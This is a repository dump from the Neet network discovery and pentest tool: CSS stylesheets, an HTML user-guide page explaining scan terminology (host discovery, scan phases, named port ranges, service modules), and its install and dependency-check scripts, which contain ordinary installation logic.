33 | header - container 34 | h1 - project name 35 | h2 - project description 36 | */ 37 | 38 | header { 39 | background: rgba(0, 0, 0, 0.1); 40 | width: 100%; 41 | border-bottom: 1px dashed #b5e853; 42 | padding: 20px 0; 43 | margin: 0 0 40px 0; 44 | } 45 | 46 | header h1 { 47 | font-size: 30px; 48 | line-height: 1.5; 49 | margin: 0 0 0 -40px; 50 | font-weight: bold; 51 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 52 | color: #b5e853; 53 | text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1), 54 | 0 0 5px rgba(181, 232, 83, 0.1), 55 | 0 0 10px rgba(181, 232, 83, 0.1); 56 | letter-spacing: -1px; 57 | -webkit-font-smoothing: antialiased; 58 | } 59 | 60 | header h1:before { 61 | content: "./ "; 62 | font-size: 24px; 63 | } 64 | 65 | header h2 { 66 | font-size: 18px; 67 | font-weight: 300; 68 | color: #666; 69 | } 70 | 71 | #downloads .btn { 72 | display: inline-block; 73 | text-align: center; 74 | margin: 0; 75 | } 76 | 77 | /* Main Content 78 | */ 79 | 80 | #main_content { 81 | width: 100%; 82 | -webkit-font-smoothing: antialiased; 83 | } 84 | section img { 85 | max-width: 100% 86 | } 87 | 88 | h1, h2, h3, h4, h5, h6 { 89 | font-weight: normal; 90 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 91 | color: #b5e853; 92 | letter-spacing: -0.03em; 93 | text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1), 94 | 0 0 5px rgba(181, 232, 83, 0.1), 95 | 0 0 10px rgba(181, 232, 83, 0.1); 96 | } 97 | 98 | #main_content h1 { 99 | font-size: 30px; 100 | } 101 | 102 | #main_content h2 { 103 | font-size: 24px; 104 | } 105 | 106 | #main_content h3 { 107 | font-size: 18px; 108 | } 109 | 110 | #main_content h4 { 111 | font-size: 14px; 112 | } 113 | 114 | #main_content h5 { 115 | font-size: 12px; 116 | text-transform: uppercase; 117 | margin: 0 0 5px 0; 118 | } 119 | 120 | #main_content h6 { 121 | font-size: 12px; 122 | text-transform: uppercase; 123 | color: #999; 124 | margin: 0 0 5px 0; 125 | } 126 | 127 | dt { 128 | font-style: italic; 129 | font-weight: bold; 130 | } 131 | 132 | ul li { 133 | list-style: none; 134 | } 135 | 136 | ul li:before { 137 | content: ">>"; 138 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 139 | font-size: 13px; 140 | color: #b5e853; 141 | margin-left: -37px; 142 | margin-right: 21px; 143 | line-height: 16px; 144 | } 145 | 146 | blockquote { 147 | color: #aaa; 148 | padding-left: 10px; 149 | border-left: 1px dotted #666; 150 | } 151 | 152 | pre { 153 | background: rgba(0, 0, 0, 0.9); 154 | border: 1px solid rgba(255, 255, 255, 0.15); 155 | padding: 10px; 156 | font-size: 14px; 157 | color: #b5e853; 158 | border-radius: 2px; 159 | -moz-border-radius: 2px; 160 | -webkit-border-radius: 2px; 161 | text-wrap: normal; 162 | overflow: auto; 163 | overflow-y: hidden; 164 | } 165 | 166 | table { 167 | width: 100%; 168 | margin: 0 0 20px 0; 169 | } 170 | 171 | th { 172 | text-align: left; 173 | border-bottom: 1px dashed #b5e853; 174 | padding: 5px 10px; 175 | } 176 | 177 | td { 178 | padding: 5px 10px; 179 | } 180 | 181 | hr { 182 | height: 0; 183 | border: 0; 184 | border-bottom: 1px dashed #b5e853; 185 | color: #b5e853; 186 | } 187 | 188 | /* Buttons 189 | */ 190 | 191 | .btn { 192 | display: inline-block; 193 | background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.3), rgba(35, 35, 35, 0.3) 50%, rgba(10, 10, 10, 0.3) 50%, rgba(0, 0, 0, 0.3)); 194 | padding: 8px 18px; 195 | border-radius: 50px; 196 | border: 2px solid rgba(0, 0, 0, 0.7); 197 | border-bottom: 2px solid rgba(0, 0, 0, 0.7); 198 | border-top: 2px solid rgba(0, 0, 0, 1); 199 | color: rgba(255, 255, 255, 0.8); 200 | font-family: Helvetica, Arial, sans-serif; 201 | font-weight: bold; 202 | font-size: 13px; 203 | text-decoration: none; 204 | text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.75); 205 | box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.05); 206 | } 207 | 208 | .btn:hover { 209 | background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.6), rgba(35, 35, 35, 0.6) 50%, rgba(10, 10, 10, 0.8) 50%, rgba(0, 0, 0, 0.8)); 210 | } 211 | 212 | .btn .icon { 213 | display: inline-block; 214 | width: 16px; 215 | height: 16px; 216 | margin: 1px 8px 0 0; 217 | float: left; 218 | } 219 | 220 | .btn-github .icon { 221 | opacity: 0.6; 222 | background: url("../images/blacktocat.png") 0 0 no-repeat; 223 | } 224 | 225 | /* Links 226 | a, a:hover, a:visited 227 | */ 228 | 229 | a { 230 | color: #63c0f5; 231 | text-shadow: 0 0 5px rgba(104, 182, 255, 0.5); 232 | } 233 | 234 | /* Clearfix */ 235 | 236 | .cf:before, .cf:after { 237 | content:""; 238 | display:table; 239 | } 240 | 241 | .cf:after { 242 | clear:both; 243 | } 244 | 245 | .cf { 246 | zoom:1; 247 | } 248 | -------------------------------------------------------------------------------- /content/doc/stylesheets/stylesheet.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: 0; 3 | padding: 0; 4 | background: #151515 url("../images/bkg.png") 0 0; 5 | color: #eaeaea; 6 | font: 16px; 7 | line-height: 1.5; 8 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 9 | } 10 | 11 | /* General & 'Reset' Stuff */ 12 | 13 | .container { 14 | width: 90%; 15 | max-width: 600px; 16 | margin: 0 auto; 17 | } 18 | 19 | section { 20 | display: block; 21 | margin: 0 0 20px 0; 22 | } 23 | 24 | h1, h2, h3, h4, h5, h6 { 25 | margin: 0 0 20px; 26 | } 27 | 28 | li { 29 | line-height: 1.4 ; 30 | } 31 | 32 | /* Header,
33 | header - container 34 | h1 - project name 35 | h2 - project description 36 | */ 37 | 38 | header { 39 | background: rgba(0, 0, 0, 0.1); 40 | width: 100%; 41 | border-bottom: 1px dashed #b5e853; 42 | padding: 20px 0; 43 | margin: 0 0 40px 0; 44 | } 45 | 46 | header h1 { 47 | font-size: 30px; 48 | line-height: 1.5; 49 | margin: 0 0 0 -40px; 50 | font-weight: bold; 51 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 52 | color: #b5e853; 53 | text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1), 54 | 0 0 5px rgba(181, 232, 83, 0.1), 55 | 0 0 10px rgba(181, 232, 83, 0.1); 56 | letter-spacing: -1px; 57 | -webkit-font-smoothing: antialiased; 58 | } 59 | 60 | header h1:before { 61 | content: "./ "; 62 | font-size: 24px; 63 | } 64 | 65 | header h2 { 66 | font-size: 18px; 67 | font-weight: 300; 68 | color: #666; 69 | } 70 | 71 | #downloads .btn { 72 | display: inline-block; 73 | text-align: center; 74 | margin: 0; 75 | } 76 | 77 | /* Main Content 78 | */ 79 | 80 | #main_content { 81 | width: 100%; 82 | -webkit-font-smoothing: antialiased; 83 | } 84 | section img { 85 | max-width: 100% 86 | } 87 | 88 | h1, h2, h3, h4, h5, h6 { 89 | font-weight: normal; 90 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 91 | color: #b5e853; 92 | letter-spacing: -0.03em; 93 | text-shadow: 0 1px 1px rgba(0, 0, 0, 0.1), 94 | 0 0 5px rgba(181, 232, 83, 0.1), 95 | 0 0 10px rgba(181, 232, 83, 0.1); 96 | } 97 | 98 | #main_content h1 { 99 | font-size: 30px; 100 | } 101 | 102 | #main_content h2 { 103 | font-size: 24px; 104 | } 105 | 106 | #main_content h3 { 107 | font-size: 18px; 108 | } 109 | 110 | #main_content h4 { 111 | font-size: 14px; 112 | } 113 | 114 | #main_content h5 { 115 | font-size: 12px; 116 | text-transform: uppercase; 117 | margin: 0 0 5px 0; 118 | } 119 | 120 | #main_content h6 { 121 | font-size: 12px; 122 | text-transform: uppercase; 123 | color: #999; 124 | margin: 0 0 5px 0; 125 | } 126 | 127 | dt { 128 | font-style: italic; 129 | font-weight: bold; 130 | } 131 | 132 | ul li { 133 | list-style: none; 134 | } 135 | 136 | ul li:before { 137 | content: ">>"; 138 | font-family: Monaco, "Bitstream Vera Sans Mono", "Lucida Console", Terminal, monospace; 139 | font-size: 13px; 140 | color: #b5e853; 141 | margin-left: -37px; 142 | margin-right: 21px; 143 | line-height: 16px; 144 | } 145 | 146 | blockquote { 147 | color: #aaa; 148 | padding-left: 10px; 149 | border-left: 1px dotted #666; 150 | } 151 | 152 | pre { 153 | background: rgba(0, 0, 0, 0.9); 154 | border: 1px solid rgba(255, 255, 255, 0.15); 155 | padding: 10px; 156 | font-size: 14px; 157 | color: #b5e853; 158 | border-radius: 2px; 159 | -moz-border-radius: 2px; 160 | -webkit-border-radius: 2px; 161 | text-wrap: normal; 162 | overflow: auto; 163 | overflow-y: hidden; 164 | } 165 | 166 | table { 167 | width: 100%; 168 | margin: 0 0 20px 0; 169 | } 170 | 171 | th { 172 | text-align: left; 173 | border-bottom: 1px dashed #b5e853; 174 | padding: 5px 10px; 175 | } 176 | 177 | td { 178 | padding: 5px 10px; 179 | } 180 | 181 | hr { 182 | height: 0; 183 | border: 0; 184 | border-bottom: 1px dashed #b5e853; 185 | color: #b5e853; 186 | } 187 | 188 | /* Buttons 189 | */ 190 | 191 | .btn { 192 | display: inline-block; 193 | background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.3), rgba(35, 35, 35, 0.3) 50%, rgba(10, 10, 10, 0.3) 50%, rgba(0, 0, 0, 0.3)); 194 | padding: 8px 18px; 195 | border-radius: 50px; 196 | border: 2px solid rgba(0, 0, 0, 0.7); 197 | border-bottom: 2px solid rgba(0, 0, 0, 0.7); 198 | border-top: 2px solid rgba(0, 0, 0, 1); 199 | color: rgba(255, 255, 255, 0.8); 200 | font-family: Helvetica, Arial, sans-serif; 201 | font-weight: bold; 202 | font-size: 13px; 203 | text-decoration: none; 204 | text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.75); 205 | box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.05); 206 | } 207 | 208 | .btn:hover { 209 | background: -webkit-linear-gradient(top, rgba(40, 40, 40, 0.6), rgba(35, 35, 35, 0.6) 50%, rgba(10, 10, 10, 0.8) 50%, rgba(0, 0, 0, 0.8)); 210 | } 211 | 212 | .btn .icon { 213 | display: inline-block; 214 | width: 16px; 215 | height: 16px; 216 | margin: 1px 8px 0 0; 217 | float: left; 218 | } 219 | 220 | .btn-github .icon { 221 | opacity: 0.6; 222 | background: url("../images/blacktocat.png") 0 0 no-repeat; 223 | } 224 | 225 | /* Links 226 | a, a:hover, a:visited 227 | */ 228 | 229 | a { 230 | color: #63c0f5; 231 | text-shadow: 0 0 5px rgba(104, 182, 255, 0.5); 232 | } 233 | 234 | /* Clearfix */ 235 | 236 | .cf:before, .cf:after { 237 | content:""; 238 | display:table; 239 | } 240 | 241 | .cf:after { 242 | clear:both; 243 | } 244 | 245 | .cf { 246 | zoom:1; 247 | } 248 | -------------------------------------------------------------------------------- /content/doc/terminology.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Neet User Guide: Terminology 12 | 13 | 14 |
15 |
16 |

Neet User Guide

17 |

Terminology used in this documentation

18 | 19 | 24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |

Neet Shell

32 | 33 |

The neet shell is a set of bash aliases which provides a rich set of features for making the most of the results produced by neet. If you are running X windows, a new terminal containing an instance of the neet shell will automatically open when you begin a scan. Apart from that, you can start an instance of a neet shell anytime, by running the neetsh command. The new shell will automatically start in the most recent (or current) results directory, saving you having to navigate there first. The neet shell has a help command, which displays a list of the available commands, together with a brief description of each.

34 | 35 |

If you wish to have a detailed log of everything that is done inside the neet shell, starting neetsh with the -s or –screen options will start it in a screen session, logging to a file.

36 | 37 |

Locality

38 |

local | remote | internet | vpn

39 | 40 |

Neet automatically classifies hosts as local, remote or accessed via VPN by examining the kernel's routing table. Additionally, you can specify on the command line if remote hosts should be assumed to be accessed over the Internet. The identified location of the hosts affects the method used for host discovery and also the speed and intensity mappings (see speed and intensity below). VPN links are identified by the naming of the interface through which the affected hosts are accessed. By default, hosts accessed by tapX or tunX interfaces are assumed to be on a VPN link (these names can be changed or added to in the configuration file via the Interface.VPN parameter).

41 | 42 |

Host Discovery

43 | 44 |

Local hosts are discovered by ARP, whilst remote hosts are assumed to be UP for the whole test unless the SDM is told (with the -p flag) to use ICMP ECHO to identify live hosts. You can alternatively use the -l option to treat hosts as DOWN if they haven't responded during the named ranges scans.

45 | 46 |

Internet hosts are treated the same as remote hosts, except for having their own set of performance mappings in the configuration file. VPN hosts which are on the same subnet as a local VPN interface will be discovered by ARP; those not on the same subnet as a local interface will be treated as remote hosts with VPN performance settings. The ICMP ECHO discovery and Limited Patience methods apply to remote, Internet and VPN hosts, but not to local hosts (ie connected directly to local interfaces). Host discovery is discussed in more detail in the Host Discovery section.

47 | 48 |

Internet Mode

49 | 50 |

Neet cannot automatically determine if remote hosts are remote on a large corporate network, or actually located across the Internet. When -I is specified on the command line, neet assumes that all remote hosts are actually Internet-based, and alters the performance of the scan accordingly.

51 | 52 |

As well as this scan tuning change, the user is prompted to confirm WHOIS lookups on the target address ranges before the scan commences.

53 | 54 |

Scan Phases

55 | 56 |

The Service Discovery Module splits the main port scan into a number of chunks or Phases - 10 by default - for example, 1-6554,6555-13109 and so on.

57 | 58 |

After scanning each block of ports, the SDM identifies and records any services which are listening on those ports before moving on to the next phase. Splitting the scan like this brings a number of benefits. Firstly, it allows any services residing in the lower ranges to be discovered much more quickly than if service identification waited for the full range to be scanned. Secondly, if a scan is paused, it can be resumed from the phase it was previously scanning, instead of beginning the whole range all over again.

59 | 60 |

Named Range Scans

61 | 62 |

Where the full range of 65535 ports is to be scanned, sometimes it can take some time for even the first phase to complete, and this time is not very productive for the pentester. Named ranges are limited ranges of ports which are scanned and analysed by the SDM before the first main phase begins. Named ranges are specified in the configuration file, and are named PortRange.Scan.TCP.NAME or PortRange.Scan.UDP.NAME, where NAME is an identifier for that port range. The named ranges are scanned in the order in which they appear in the configuration file. For example, the Windows named range is specified as "PortRange.Scan.TCP.Windows=111,135,139,445" in the configuration file, and is the very first range to be scanned and analysed by neet, providing very fast identification of Windows from non-Windows hosts. You are free to add your own named ranges, or to modify the default ones to quickly identify key services. Ports which are scanned as part of a named range are automatically excluded from later scans of the same protocol, so services will not go through the identification process twice.

63 | 64 |

SDM - Service Discovery Module.

65 | 66 |

There is only one SDM, and it is responsible for discovering hosts and identifying services. It is multi-threaded, and so can test multiple IP addresses at once. When you specify a number of threads on the command line (or in the configuration file), it is the number of SDM threads that you are specifying. The SDM simply discovers services and writes them to files in the services directory. It can also note issues which can be spotted from the process of identifying services - support for SSH protocol 1 for instance. It does not do any testing of the services.

67 | 68 |

GSM - Global Service Monitors

69 | 70 |

GSMs are what make neet extensible - each is a module which performs a specific check. For example, the SMTP Global Service Monitor is only interested in checking SMTP servers, and knows how to do nothing else. These modules are also multi-threaded and can check more than one instance of a service at once. The term Global refers to the fact that the module is interested in all instances of the service which it is monitoring, regardless of where they are in terms of host, protocol and port.

71 | 72 |

Scan Intensity

73 | 74 |

The specified scan intensity is an indication of how aggressively the SDM should probe services in its attempts to identify them. The setting maps to a variety of intensity settings which apply mostly to the amap and nmap tools. The mappings are all contained in the configuration file, and can be changed depending on your experiences. The default settings have been tried and found suitable in the environments in which neet has been tested to date, but they may not suit all use cases. The individual intensity mappings for a given nominal setting (eg light) will vary depending on the relative location of the host - local, remote etc.

75 | 76 |

Scan Speed

77 | 78 |

The specified scan speed is an indication of how rapidly the scan should progress, and maps to a variety of speed, timeout and retry settings which apply to a large number of the tools used by neet. The mappings are all contained in the configuration file, and can be changed depending on your experiences. The default settings have been tried and found suitable in the environments in which neet has been tested to date, but they may not suit all use cases. The individual speed mappings for a given nominal setting (eg fast) will vary depending on the relative location of the host - local, remote etc.

79 | 80 |
81 |
82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /content/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | export VERSION=`cat VERSION` 26 | export PREFIX=/opt 27 | 28 | if [ ! -z $INVOKEDBYNEETUPDATE ] && [ $INVOKEDBYNEETUPDATE -eq 1 ]; then 29 | #echo "neet core installer invoked by neet-update. Performing quick install only." 30 | install/coreinstall.sh 31 | exit $? 32 | fi 33 | 34 | if [ `id -u` -ne 0 ]; then 35 | echo "You must be root to install Neet." 36 | exit 1 37 | fi 38 | 39 | if [ ! -d install ] || [ ! -d doc ] || [ ! -d main ] || [ ! -f install/installsupport ]; then 40 | echo "You must run this script from the topmost install directory." 41 | exit 1 42 | fi 43 | 44 | 45 | echo 46 | echo "Neet Discovery Engine v${VERSION} - Installing..." 47 | echo 48 | cat << EOF 49 | Copyright (C) 2008-2016 Jonathan Roach 50 | This program comes with ABSOLUTELY NO WARRANTY 51 | This is free software, and you are welcome to redistribute it 52 | under certain conditions; view the accompanying LICENSE for details. 53 | EOF 54 | 55 | export NEETINSTALLER=1 56 | export UPDATEONLY=0 57 | export NEET="${PREFIX}/neet" 58 | export CONFDIR="${NEET}/etc" 59 | export CONFIG="${CONFDIR}/neet.conf" 60 | export INST="$PWD" 61 | 62 | # Import some functions 63 | . ./install/installsupport 64 | 65 | [ -f install/error ] && rm install/error 66 | 67 | # Is this a virgin install? 68 | if [ -f ${NEET}/core/installsupport ]; then 69 | cat << EOM 70 | 71 | ** IMPORTANT ** 72 | 73 | You are running the full installer, but outdated components can be 74 | updated more efficiently by periodically running neet-update. This 75 | installer will remove the existing neet installation and re-install 76 | it from scratch. 77 | 78 | If this is what you want type YES, otherwise I will run neet-update 79 | for you and update only the components which require updating. 80 | 81 | If you want to exit the installer without changing anything, type 82 | "exit" (without the quotes). 83 | 84 | >> If you just hit ENTER or type anything other than exit or YES, 85 | then I will run neet-update. 86 | 87 | EOM 88 | read result 89 | if [ ! -z $result ]; then 90 | if [ "$result" == "exit" ]; then 91 | exit 0 92 | elif [ "$result" == "YES" ]; then 93 | UPDATEONLY=0 94 | else 95 | UPDATEONLY=1 96 | fi 97 | else 98 | UPDATEONLY=1 99 | fi 100 | fi 101 | 102 | if [ $UPDATEONLY -eq 1 ]; then 103 | echo "Running neet-update...." 104 | "${NEET}/bin/neet-update" 105 | exit 0 106 | fi 107 | 108 | # This is the main installation process, not just an update. 109 | # If we can, download any dependencies from the distro repo. 110 | selectDistro 111 | echo 112 | 113 | if [ ! -z $DISTRO ] && [ -f "install/pkg/$DISTRO" ]; then 114 | # Best case - we know exactly what it is 115 | echo " Installing pre-requisites for $DISTRO" 116 | apt-get-list "install/pkg/$DISTRO" 117 | 118 | elif [ ! -z $FALLBACK ] && [ -f "install/pkg/$FALLBACK" ]; then 119 | # Second-best case - we don't have a definitive list 120 | # of pre-requisites but we have a reasonable idea. 121 | echo " Couldn't determine your exact distribution." 122 | echo " Using pre-requisite listing for $FALLBACK instead." 123 | apt-get-list "install/pkg/$FALLBACK" 124 | 125 | else 126 | # We really have no idea 127 | echo " Couldn't determine your distribution. You'll have to find any missing" 128 | echo " dependencies yourself." 129 | fi 130 | 131 | # Check the build environment 132 | 133 | for build in gcc ld make; do 134 | if ! systemHas $build; then 135 | echo 136 | echo "** Your system doesn't appear to include a working software build environment, which" 137 | echo " is required for neet installation. What kind of pentester doesn't have a build" 138 | echo " environment? Debian/Ubuntu users are advised to install the gcc, make, autoconf," 139 | echo " automake, flex and bison packages. Fedora and Mandrake users are advised to" 140 | echo " upgrade to a decent distribution. Gentoo and Arch users should never, ever read this." 141 | echo 142 | touch install/error 143 | exit 1 144 | fi 145 | done 146 | 147 | # Check the base dependencies 148 | echo 149 | echo "Checking that your system has the required dependencies..." 150 | echo 151 | cd install/ 152 | ./checkdeps.pl 153 | ERROR=$? 154 | cd "$INST" 155 | [ -f install/dependencyErrors.log ] && mv install/dependencyErrors.log . 156 | echo 157 | if [ $ERROR -eq 2 ]; then 158 | echo "Unmet critical dependencies. Will not continue installing." 159 | echo "See the following log file: dependencyErrors.log" 160 | touch install/error 161 | exit 2 162 | fi 163 | 164 | # Clean up existing installation first 165 | . ./uninstall.sh 166 | 167 | echo "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -" 168 | echo 169 | echo "Installing the Neet Discovery Engine to ${NEET}..." 170 | 171 | install/coreinstall.sh 172 | 173 | cd $INST 174 | 175 | #################################### 176 | 177 | # Now invoke neet-update to install the rest of the packages 178 | ${NEET}/bin/neet-update 179 | 180 | # Ensure that the location information is up to date 181 | ${NEET}/bin/updateLocations 182 | 183 | # Finally, set up the file permissions 184 | chown -R root.root "$NEET" 185 | chmod -R go-w "$NEET" 186 | chmod -R +X "$NEET" 187 | chmod 755 ${NEET}/bin/* 188 | 189 | #################################### 190 | echo "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -" 191 | echo 192 | 193 | echo "Neet $VERSION has been installed." 194 | 195 | MISSING="" 196 | WARN=0 197 | for component in modules resources deps shell upload bundled; do 198 | if ! grep "neet-${component}=" ${CONFDIR}/versions >/dev/null 2>&1; then 199 | WARN=1 200 | MISSING="$MISSING $component" 201 | fi 202 | done 203 | 204 | if [ $WARN -eq 1 ]; then 205 | cat << EOM 206 | 207 | == WARNING == 208 | One or more critical components were not installed. This could happen if you 209 | currently have no Internet access, or if the proxy is not set up correctly to 210 | retrieve content from GitHub. To correct this, please check your connectivity 211 | and then run neet-update. 212 | 213 | The following components were missing: 214 | 215 | EOM 216 | for component in $MISSING; do 217 | echo " - neet-$component" 218 | done 219 | fi 220 | 221 | cat << EOF 222 | 223 | Thank you for installing Neet. Please review the man pages and the HTML 224 | documentation supplied in the doc directory to find out how to get the best 225 | from it. 226 | 227 | EOF 228 | 229 | -------------------------------------------------------------------------------- /content/install/checkdeps.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | use strict; 25 | unshift @INC, ('.'); 26 | require checkdeps; 27 | 28 | # This script checks the dependencies prior to the installation of neet 29 | my @locations; 30 | 31 | readDependencies(); 32 | unlink "dependencyErrors.log"; 33 | 34 | my (@criticals,@nonrecs,$missing); 35 | my $error=0; 36 | 37 | for my $component (listExecutableComponents()){ 38 | my ($result,$path)=checkExecutableComponent($component); 39 | my ($executable,$fullpath); 40 | if ($path){ 41 | $executable=getParam($component,"executable"); 42 | $fullpath="$path/$executable"; 43 | } 44 | if ($result==2){ 45 | push @criticals, $component; 46 | } elsif ($result==1){ 47 | push @nonrecs, $component; 48 | push @locations, "$executable=$fullpath\n" if (!isMissing($component)); 49 | } else { 50 | push @locations, "$executable=$fullpath\n" if (!isMissing($component)); 51 | 52 | } 53 | } 54 | 55 | for my $c (@nonrecs){ 56 | my $message=getMessage($c,"recommended"); 57 | my $download=getParam($c,"download"); 58 | if ($download){ 59 | $message .= "\n $c can be downloaded from the following URI:\n $download\n"; 60 | } 61 | if (!isMissing($c)){ 62 | errorLog ("*-------------------------------------------------------------------------*\n" . 63 | " Dependency \"$c\" version " . actualVersion($c) . " was found, but it really should be at least\n" . 64 | " version " . recommendedVersion($c) . ".\n\n" . $message . 65 | "*-------------------------------------------------------------------------*\n\n"); 66 | } else { 67 | errorLog ("*-------------------------------------------------------------------------*\n" . 68 | " Non-critical dependency \"$c\" could not be found.\n\n" . $message . 69 | "*-------------------------------------------------------------------------*\n\n"); 70 | } 71 | $error=1; 72 | } 73 | for my $c (@criticals){ 74 | my $message=getMessage($c,"critical"); 75 | if (index($message,"No help text")==1){ 76 | $message=getMessage($c,"recommended"); 77 | } 78 | my $download=getParam($c,"download"); 79 | if ($download){ 80 | $message .= "\n $c can be downloaded from the following URI:\n $download\n"; 81 | } 82 | if (!isMissing($c)){ 83 | errorLog ("*!!!!---------------------------------------------------------------!!!!*\n" . 84 | " Critical dependency: \"$c\", minimum version " . criticalVersion($c) . ", could not be found.\n" . 85 | " The most recent version which could be found was version " . actualVersion($c) . ".\n\n" . $message . 86 | "*-------------------------------------------------------------------------*\n"); 87 | } else { 88 | errorLog ("*!!!!---------------------------------------------------------------!!!!*\n\n" . 89 | " Critical missing dependency: \"$c\" could not be found.\n\n" . $message . 90 | "*-------------------------------------------------------------------------*\n\n"); 91 | } 92 | $error=2; 93 | } 94 | 95 | if ($error < 2){ 96 | unlink "locations"; 97 | if (open(LOC,">locations")){ 98 | print LOC @locations; 99 | close LOC; 100 | } 101 | } 102 | 103 | # Now check the PERL kit 104 | $#criticals=-1; $#nonrecs=-1; 105 | 106 | for my $component (listPerlComponents()){ 107 | my $result=checkPerlComponent($component); 108 | if (!$result){ 109 | if (getParam($component,"critical")){ 110 | my $message=getMessage($component,"critical"); 111 | if (index($message,"No help text")==1){ 112 | $message=getMessage($component,"recommended"); 113 | } 114 | errorLog ("*!!!!---------------------------------------------------------------!!!!*\n\n" . 115 | " Critical missing PERL dependency: \"$component\" could not be found.\n\n" . $message . 116 | "*-------------------------------------------------------------------------*\n\n"); 117 | $error=2; 118 | } else { 119 | my $message=getMessage($component,"recommended"); 120 | errorLog ("*-------------------------------------------------------------------------*\n" . 121 | " Non-critical PERL library dependency \"$component\" could not be found.\n\n" . $message . 122 | "*-------------------------------------------------------------------------*\n\n"); 123 | $error=1 if ($error==0); 124 | } 125 | } 126 | } 127 | 128 | exit $error; 129 | 130 | -------------------------------------------------------------------------------- /content/install/coreinstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | 26 | # This program does the installation of the neet core. It should only be 27 | # invoked by the neet installer or neet-update. 28 | 29 | if [ -z $NEETINSTALLER ] && [ -z $INVOKEDBYNEETUPDATE ]; then 30 | echo "This script should NOT be inkoved manually! Leave it alone!" 31 | exit 1 32 | fi 33 | 34 | . ./install/installsupport 35 | 36 | # Base permissions 37 | umask 022 38 | 39 | for directory in bin etc pkg/bin doc core/update/build; do 40 | mkdir -p "${NEET}/$directory" 41 | done 42 | 43 | if [ ! -d "${NEET}/bin" ]; then 44 | echo "Couldn't create the Neet home directory ${NEET}. Quitting." 45 | touch install/error 46 | exit 1 47 | fi 48 | 49 | # Config information 50 | cp install/installsupport install/githubVersion "${NEET}/core/" 51 | 52 | cd main 53 | 54 | for subdir in bin etc; do 55 | cp -R "${subdir}" "${NEET}/" 56 | done 57 | 58 | # Perl modules 59 | cp -R JR Neet "${NEET}/core/" 60 | 61 | # Now, set up links to the directories in the main $PATH 62 | for bin in neet neet-update; do 63 | ln -sf ${NEET}/bin/${bin} /usr/bin/${bin} 2>/dev/null 64 | done 65 | 66 | # Somewhere for the documentation to go 67 | cp -R ../doc/* ${NEET}/doc/ 68 | 69 | # Now the man pages 70 | MANIN=0 71 | if [ -f /etc/manpath.config ]; then 72 | for path in `grep ^MANDATORY_MANPATH /etc/manpath.config | grep /usr/local/ | awk {print'$2'}`; do 73 | if [ -d "$path/man1/" ]; then 74 | cp man/*.gz ${path}/man1/ 75 | MANIN=1 76 | MANPATH=$path 77 | break 78 | fi 79 | done 80 | else 81 | for path in `echo $MANPATH | sed -e 's/:/ /g'`; do 82 | if [ -d "$path/man1" ]; then 83 | cp man/*.gz ${path}/man1/ 84 | MANIN=1 85 | MANPATH=$path 86 | break 87 | fi 88 | done 89 | 